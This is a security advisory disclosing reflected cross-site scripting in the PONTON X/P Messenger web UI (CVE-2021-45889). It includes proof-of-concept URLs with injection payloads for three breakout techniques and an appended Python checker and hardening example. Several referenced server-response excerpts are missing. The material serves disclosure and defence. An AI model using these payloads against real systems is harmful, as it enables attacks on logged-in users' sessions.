-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2021-078
Product: PONTON X/P Messenger
Manufacturer: PONTON GmbH
Affected Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429)
Tested Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429)
Vulnerability Type: Reflected Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed in release of version 3.11.2
Manufacturer Notification: 2022-01-25
Solution Date: 2022-02-07
Public Disclosure: 2022-03-11
CVE Reference: CVE-2021-45889
Author of Advisory: Stefan Walter, Thibaud Kehler, Tarek Awadallah (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

> The PONTON X/P Messenger (or PONTON X/P for short) is PONTON's
> high-quality B2B integration solution with a proven track-record in
> several industries since 2001. PONTON X/P is a highly configurable
> ebXML, AS/1, AS/2, AS/3 and AS/4 compliant messaging software. It
> provides additional features to deal with typical B2B integration
> issues (such as a listener component for the DMZ, certificate
> management and non-repudiation of messages). PONTON X/P is typically
> used as communication layer in a business consortium or as an (OEM)
> communication extension of an existing software application.

The tested versions were not the most recent ones; the current 4.x
versions are not affected. The vulnerable pages live under
/pontonxp/private/, so a payload only executes in the browser of a user
who is logged in to the PONTON X/P web UI, and that UI is normally
reachable only from the internal network. The vulnerability is fixed in
PONTON X/P version 3.11.2; users of the 3.x branch should upgrade to
version 3.11.2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Several functions of the web UI are vulnerable to reflected cross-site
scripting. The common entry point is /pontonxp/private/index.jsp, which
takes the page to load into its content iframe from the query string and
reflects that value into the response without sufficient validation or
output encoding. Depending on the chosen target, the reflected value
lands in a JavaScript context, is used verbatim as the iframe src, or can
be used to break out of the src attribute.
For testing purposes, a local installation was set up using the
application binaries provided at [2] and the instructions at [3]:

    $ wget 'https://www.ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip'
    $ unzip PontonXP-Messenger-3.10.0-Linux.zip -d PontonXP-Messenger-3.10.0-Linux
    $ cd PontonXP-Messenger-3.10.0-Linux
    $ ./pontonxp start

Afterwards, the web application is reachable at https://localhost:8443.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS GmbH identified three different categories of reflected cross-site
scripting.

The first category can be triggered by visiting, for example,

https://localhost:8443/pontonxp/private/index.jsp?partners/ShowNonLocalPartners.do?localID=%27-prompt(%22SySS%20RXSS%20PoC%22)//

As can be seen in the following excerpt of the server response, the
payload is injected directly into a JavaScript context: the encoded
single quote (%27) closes the string literal that holds the localID
value, prompt(...) is then evaluated as code, and the trailing //
comments out the remainder of the line so the script stays syntactically
valid:

The second category can be triggered by visiting

https://localhost:8443/pontonxp/private/index.jsp?javascript:alert(%27SySS_RXSS_PoC%27)

As can be seen in the following excerpt of the server response, the
payload is injected into the iframe src and then executed. No breakout
of the attribute is needed here: a javascript: URI used as the src of an
iframe runs in the origin of the embedding page, and entity-encoding the
value would not stop it, because browsers decode attribute values before
interpreting them as a URL.
The third category can be triggered by visiting either one of the
following URLs (the list is non-exhaustive):

* https://localhost:8443/pontonxp/private/index.jsp?database/databaseTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E
* https://localhost:8443/pontonxp/private/index.jsp?activation/activationMainTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E
* https://localhost:8443/pontonxp/private/index.jsp?communication/serverTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E
* https://localhost:8443/pontonxp/private/index.jsp?emailNotification/notificationTab.jsp?ucbgm%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E

As can be seen in the following excerpt of the server response for the
first request in the list, the payload is used to break out of the
iframe src and to execute code by inserting a new script tag: the
encoded double quote (%22) closes the src attribute value, %3E closes
the iframe start tag, %3C/iframe%3E closes the element, and the script
element that follows is parsed as part of the page:
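The following Python script is an added example; it is not part of the SySS advisory and not PONTON's code. It models the three PoC categories above against a constructed mock of the index.jsp frame rendering (the real response markup is not reproduced here): target_from_url() extracts the reflected value from the PoC URLs, reflection_status() and unsafe_reflection() classify how a response body reflects it, and render_frame_hardened() shows the check a fix needs. The allow-list of relative .jsp/.do targets it enforces is an assumption of this example, not PONTON's actual fix; it is applied before attribute encoding because encoding alone does not neutralise a javascript: URI in a src attribute.

```python
"""Reflection check and hardened frame-target builder for the index.jsp?<target>
pattern described in SYSS-2021-078. Added example, not PONTON's code: the render
functions are a constructed mock of the behaviour the advisory describes."""
import html
import re
from urllib.parse import unquote, urlsplit

# The three PoC targets from the advisory, URL-decoded: what the server sees
# after "index.jsp?" and reflects into the page.
POC_TARGETS = {
    "js-context": "partners/ShowNonLocalPartners.do?localID='-prompt(\"SySS RXSS PoC\")//",
    "javascript-uri": "javascript:alert('SySS_RXSS_PoC')",
    "attribute-breakout": 'database/databaseTab.jsp?syss"></iframe>'
                          '<script>alert("SySS RXSS PoC");</script>',
}

# Allow-list for frame targets (an assumption for this example, not PONTON's
# fix): relative path segments of word characters, a .jsp or .do file, and an
# optional simple query string. No scheme, no "..", no quotes or angle brackets.
_SAFE_TARGET = re.compile(
    r"^(?:[A-Za-z0-9_]+/)*[A-Za-z0-9_]+\.(?:jsp|do)(?:\?[A-Za-z0-9_=&]*)?$"
)
_HAS_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def target_from_url(url: str) -> str:
    """Return the URL-decoded query string of an index.jsp?<target> link."""
    return unquote(urlsplit(url).query)


def is_safe_target(target: str) -> bool:
    """True if the target matches the allow-list."""
    return _SAFE_TARGET.match(target) is not None


def render_frame_vulnerable(target: str) -> str:
    """Mock of the unsafe pattern: the query string lands in the iframe src verbatim."""
    return f'<iframe name="content" src="{target}"></iframe>'


def render_frame_hardened(target: str) -> str:
    """Validate first, then attribute-encode; anything off the allow-list is refused.
    Encoding alone would not be enough: a javascript: URI survives entity encoding
    because browsers decode attribute values before treating them as a URL."""
    if not is_safe_target(target):
        raise ValueError(f"rejected frame target: {target!r}")
    return f'<iframe name="content" src="{html.escape(target, quote=True)}"></iframe>'


def reflection_status(body: str, target: str) -> str:
    """How a response reflects the target: 'raw', 'encoded' or 'absent'."""
    if target in body:
        return "raw"
    if html.escape(target, quote=True) in body:
        return "encoded"
    return "absent"


def unsafe_reflection(body: str, target: str) -> bool:
    """Flag a response that reflects a disallowed target in an exploitable way:
    raw for any disallowed target, or even entity-encoded when the target
    carries a URL scheme such as javascript:."""
    status = reflection_status(body, target)
    if status == "absent" or is_safe_target(target):
        return False
    return status == "raw" or _HAS_SCHEME.match(target) is not None


if __name__ == "__main__":
    for name, target in POC_TARGETS.items():
        body = render_frame_vulnerable(target)
        print(f"{name:20} vulnerable mock -> unsafe={unsafe_reflection(body, target)}")
        try:
            render_frame_hardened(target)
        except ValueError as exc:
            print(f"{name:20} hardened        -> {exc}")
    print(render_frame_hardened("activation/activationMainTab.jsp"))
```

To use reflection_status() and unsafe_reflection() against a live instance, fetch each PoC URL with an authenticated session (the pages sit under /pontonxp/private/) and pass the response body together with target_from_url(url); the script itself performs no network access.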